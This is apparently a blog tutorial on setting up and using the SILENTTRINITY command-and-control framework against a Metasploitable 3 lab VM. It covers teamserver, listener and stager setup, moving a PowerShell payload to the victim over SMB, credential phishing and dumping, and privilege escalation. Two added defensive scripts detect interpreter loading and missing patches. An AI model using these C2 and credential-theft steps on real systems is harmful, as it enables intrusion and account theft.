If you want to use a new command and control framework that isn’t Empire or Cobalt Strike, there are options. That is why I am showing how to use SILENTTRINITY which comes to us from github.com/byt3bl33d3r.
SILENTTRINITY lets the user install persistence, escalate privileges, pop random message boxes, make the victim’s mouse move (I haven’t tested this one yet, have you?), run commands, and more, all over encrypted command and control connections.
The listener/stager/module architecture is very similar to Empire’s, so this walkthrough may ring a few bells.
There are many tutorials (well, there are some) on using SILENTTRINITY, but I find they are missing some pretty critical details. That’s my soapbox; I tried to cover all the essentials in this tutorial.
Want to learn Linux privilege escalation for real? Give Escalate_Linux a shot using my walkthrough of course.
Here’s What You Need
- Windows VM – I am using Metasploitable 3 VM
- Kali Linux VM
- SILENTTRINITY from GitHub
What is SILENTTRINITY?
SILENTTRINITY is a modern, asynchronous, multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NET's DLR. It’s the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs, a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell-style attacks (as it offers much more flexibility over traditional C# tradecraft), only without using PowerShell in any way.
https://github.com/byt3bl33d3r/SILENTTRINITY
“Explain it to me like I’m 5”
Well, Microsoft caught on to the fact that malicious use of PowerShell was going on, so they (and other security tool vendors) now have built-in signatures for such attacks.
So now that PowerShell is too hot, there is a movement to utilize C#, as it has access to the same .NET APIs that PowerShell does. This is blended with another movement to LOL (live off the land): why download exploit tools when they are already installed in Windows?
“How is SILENTTRINITY any different?”
ST is admittedly the result of “research into embedded third-party .NET scripting languages to dynamically call .NET API’s”. The idea is that .NET-compatible languages are now being used to carry out attacks in Windows.
“Boo is an object-oriented, statically typed, general-purpose programming language that seeks to make use of the Common Language Infrastructure’s support for Unicode, internationalization, and web applications, while using a Python-inspired syntax and a special focus on language and compiler extensibility.” (Wikipedia)
The post-exploitation modules are written in Boo. IronPython, a .NET implementation of Python that targets the .NET framework, is used in ST as well.
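From the defender's side, the BYOI pattern described above has a tell: a process that has no business hosting a scripting runtime (PowerShell, a service host, an Office binary) loads the Boo or IronPython interpreter assemblies. The script below is an added example, not code from SILENTTRINITY or from this post. It assumes that the interpreter and DLR assemblies carry the simple names Boo.Lang*, IronPython*, Microsoft.Scripting* and Microsoft.Dynamic* (true for the stock Boo and IronPython distributions), and that you have CLR assembly-load telemetry (for instance the .NET runtime ETW loader events; file-based image-load logging can miss assemblies loaded from a byte array in memory). The log lines are constructed for the example, not real telemetry.

```python
"""Flag non-allowlisted processes that load an embedded .NET interpreter (BYOI).

Added example for illustration; the assembly-name prefixes are an assumption
based on the stock Boo/IronPython/DLR distributions, and the log lines below
are constructed, not captured from a real host.
"""
import re
from collections import defaultdict

# Simple assembly-name prefixes that indicate an embedded interpreter or the DLR.
INTERPRETER_PREFIXES = ("boo.lang", "ironpython", "microsoft.scripting", "microsoft.dynamic")

# Processes where a scripting runtime is expected (assumption: tune per estate).
ALLOWLIST = {"ipy.exe", "ipy64.exe", "booi.exe", "booc.exe"}

# Constructed records in the shape of CLR loader telemetry (pid, image path,
# assembly display name). Version strings are placeholders.
SAMPLE_LOG = """\
2020-01-15T10:02:11Z AssemblyLoad pid=4120 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe assembly="System.Management.Automation, Version=0.0.0.0, Culture=neutral"
2020-01-15T10:02:12Z AssemblyLoad pid=4120 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe assembly="Boo.Lang, Version=0.0.0.0, Culture=neutral"
2020-01-15T10:02:12Z AssemblyLoad pid=4120 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe assembly="Boo.Lang.Compiler, Version=0.0.0.0, Culture=neutral"
2020-01-15T10:02:12Z AssemblyLoad pid=4120 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe assembly="Boo.Lang.Parser, Version=0.0.0.0, Culture=neutral"
2020-01-15T10:05:40Z AssemblyLoad pid=2200 image=C:\\Tools\\IronPython\\ipy.exe assembly="IronPython, Version=0.0.0.0, Culture=neutral"
2020-01-15T10:05:40Z AssemblyLoad pid=2200 image=C:\\Tools\\IronPython\\ipy.exe assembly="Microsoft.Dynamic, Version=0.0.0.0, Culture=neutral"
2020-01-15T10:07:03Z AssemblyLoad pid=5511 image=C:\\Windows\\System32\\notepad.exe assembly="mscorlib, Version=0.0.0.0, Culture=neutral"
2020-01-15T10:09:55Z AssemblyLoad pid=880 image=C:\\Windows\\System32\\svchost.exe assembly="Microsoft.Scripting, Version=0.0.0.0, Culture=neutral"
2020-01-15T10:09:55Z AssemblyLoad pid=880 image=C:\\Windows\\System32\\svchost.exe assembly="IronPython, Version=0.0.0.0, Culture=neutral"
"""

LINE_RE = re.compile(r'pid=(?P<pid>\d+)\s+image=(?P<image>\S+)\s+assembly="(?P<asm>[^"]+)"')


def parse_events(text):
    """Yield (process_name, pid, simple_assembly_name) for each parseable line."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        image = m.group("image")
        proc = image.replace("/", "\\").rsplit("\\", 1)[-1]
        simple_name = m.group("asm").split(",", 1)[0].strip()
        yield proc, int(m.group("pid")), simple_name


def is_interpreter_assembly(name):
    n = name.lower()
    return any(n.startswith(p) for p in INTERPRETER_PREFIXES)


def find_byoi_loads(text):
    """Return {(process, pid): [assemblies]} for non-allowlisted processes that
    loaded an interpreter/DLR assembly."""
    hits = defaultdict(set)
    for proc, pid, asm in parse_events(text):
        if proc.lower() in ALLOWLIST:
            continue
        if is_interpreter_assembly(asm):
            hits[(proc, pid)].add(asm)
    return {k: sorted(v) for k, v in hits.items()}


def format_alerts(hits):
    return [f"ALERT BYOI: {proc} (pid {pid}) loaded {', '.join(asms)}"
            for (proc, pid), asms in sorted(hits.items())]


if __name__ == "__main__":
    for alert in format_alerts(find_byoi_loads(SAMPLE_LOG)):
        print(alert)
```

The allowlist is deliberately short: the point of the check is not that these assemblies are malicious, but that they are rarely expected inside a general-purpose host process, so any hit is worth a look at the parent process and the command line.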
Installation
I found the best installation steps in the article at hunter2.gitbook.io; however, I modified some of them because the current version’s layout did not match a few of his listed commands.
```shell
# Grab the dependencies
cd /opt
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install

# Setup SILENTTRINITY
apt install python3 python3-pip
git clone https://github.com/byt3bl33d3r/SILENTTRINITY
cd SILENTTRINITY
python3 -m pip install -r requirements.txt

# Launch
python3 st.py
```
Start the Teamserver
The first step is to start the teamserver. Without it, running ST gives a “disconnected” message and commands won’t work.
```shell
root@kali:/opt/impacket/SILENTTRINITY# python3 teamserver.py --port 1234 192.168.56.101 skippy123
```
The syntax for this command is python3 teamserver.py --port {port to listen on} {host IP address} {teamserver password}
UPDATE (1-2020): teamserver.py is gone now, so start the teamserver this way instead.
```shell
python3 st.py teamserver --port 1234 10.0.0.250 user skippy123
```
Then connect to the teamserver.
```shell
root@kali:/opt/impacket/SILENTTRINITY# python3 st.py client
>> teamservers
connect wss://username:password@192.168.56.101:1234
```
Start SILENTTRINITY
Remember the teamserver we started? We connect to it in order to start ST. For some reason this is a step that few other tutorials and sites even mention.
```shell
root@kali:/opt/impacket/SILENTTRINITY# python3 st.py client wss://username:password@192.168.56.101:1234
```
A successful connection looks like this:
```
[INFO] - connection.py: connect - Connected to wss://192.168.56.101:1234
```
Start a Listener
A listener is required, and the listener/stager/module architecture is very similar to Empire’s. Type listeners, then use + Tab, to see that there are two options: http and https.
Choose a Stager
Picking a stager depends on the task to be accomplished. For this simple setup I am using the PowerShell stager, because I know it will output a .ps1 script for me to run on the victim machine.
Move the File to Victim
With the payload generated, it is now time to move the file to the Windows machine. For this task I use Impacket’s smbserver script.
```shell
root@kali:/opt/impacket/SILENTTRINITY# smbserver.py kali /tmp
```
Then use the copy command to get the file from the SMB server.
```
copy stager.ps1 //192.168.56.101/opt
```
Execute the Payload
I run the payload (the stager) with PowerShell for the purposes of this tutorial.
Mimikatz then grabs whatever account credentials it can.
Post Exploitation
After running the payload, our listener gets a session back. From there we can run post-exploitation steps to escalate privileges and/or terrorize the victim user (the author has a great sense of humor).
Select a Module
There are many modules to choose from. Take a look at msgbox.
A creepy message box appears on the Windows machine.
Or take a look at CredPhisher which is one of my favorites.
On the Windows machine a new prompt pops up; it looks as if “Windows Security” needs the user’s credentials ASAP for some reason!
The credentials are then sent to the C2 server for us to see.
Privilege Escalation
We are going to do more enumeration; this is referred to as post-exploit local enumeration.
```
boo/execute-assembly │ Execute a .NET assembly in memory
```
We are going to use Watson.
Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities.
https://github.com/rasta-mouse/Watson
```
modules
use execute-assembly
set Assembly /opt/Watson.exe
run {session UID}
```
Or use getsystem, which in this case works against Metasploitable 3.
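The flip side of Watson’s missing-KB enumeration is the check a defender runs on their own hosts: compare the hotfix list a machine reports against the patch baseline it is supposed to carry. The script below is an added example, not Watson’s code and not from this post. It assumes the installed-hotfix list is the text produced by wmic qfe get HotFixID or PowerShell Get-HotFix (any text containing KB identifiers works); the sample output and the baseline KB numbers are constructed placeholders, not real Microsoft updates.

```python
"""Report baseline KBs missing from a host's installed-hotfix listing.

Added example; the sample listing and the baseline KB numbers are constructed
placeholders (KB0000001 ...), not real updates.
"""
import re

KB_RE = re.compile(r"\bKB\d{6,7}\b", re.IGNORECASE)

# Constructed sample in the shape of `wmic qfe get HotFixID` output.
SAMPLE_QFE_OUTPUT = """HotFixID
KB0000001
KB0000002
KB0000004
"""

# Constructed sample in the shape of `Get-HotFix | Format-Table` output.
SAMPLE_GETHOTFIX_OUTPUT = """Source        Description      HotFixID      InstalledBy          InstalledOn
------        -----------      --------      -----------          -----------
WIN-HOST      Security Update  KB0000001     NT AUTHORITY\\SYSTEM  1/10/2020 12:00:00 AM
WIN-HOST      Update           KB0000005     NT AUTHORITY\\SYSTEM  1/12/2020 12:00:00 AM
"""

# Placeholder baseline: the KBs this host class must carry (assumption).
BASELINE = ["KB0000001", "KB0000002", "KB0000003", "KB0000004", "KB0000005"]


def parse_installed_kbs(text):
    """Extract the set of KB identifiers (upper-cased) from hotfix listing text."""
    return {m.group(0).upper() for m in KB_RE.finditer(text)}


def missing_kbs(installed, baseline):
    """Return baseline KBs that are not present in the installed set, sorted."""
    wanted = {kb.upper() for kb in baseline}
    return sorted(wanted - set(installed))


def coverage_report(text, baseline):
    """Return (installed_count, missing_list) for one host's listing."""
    installed = parse_installed_kbs(text)
    return len(installed), missing_kbs(installed, baseline)


if __name__ == "__main__":
    for label, listing in (("wmic", SAMPLE_QFE_OUTPUT), ("Get-HotFix", SAMPLE_GETHOTFIX_OUTPUT)):
        count, missing = coverage_report(listing, BASELINE)
        print(f"{label}: {count} hotfixes installed, missing {missing}")
```

Presence of a KB says nothing about whether the update was applied correctly or superseded, so treat the missing list as a prompt to check the host against your patch-management source of truth rather than as the final word.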
Summary of Using SILENTTRINITY
This is a basic overview of the steps for using ST.
- python3 teamserver.py --port 1234 192.168.56.101 skippy123
- python3 st.py wss://username:password@192.168.56.101:1234
- listeners
- use http -or- https
- start
- stagers
- use PowerShell/dll/wmic/csharp/exe/msbuild
- generate http -or- https
- Run payload on victim
- sessions
- modules
- use boo/{module}
- run {session name}
FAQ
Q. I am running post-exploit modules with the modules command, but nothing happens?
A. Did you start a listener? Remember to start a listener with the start command.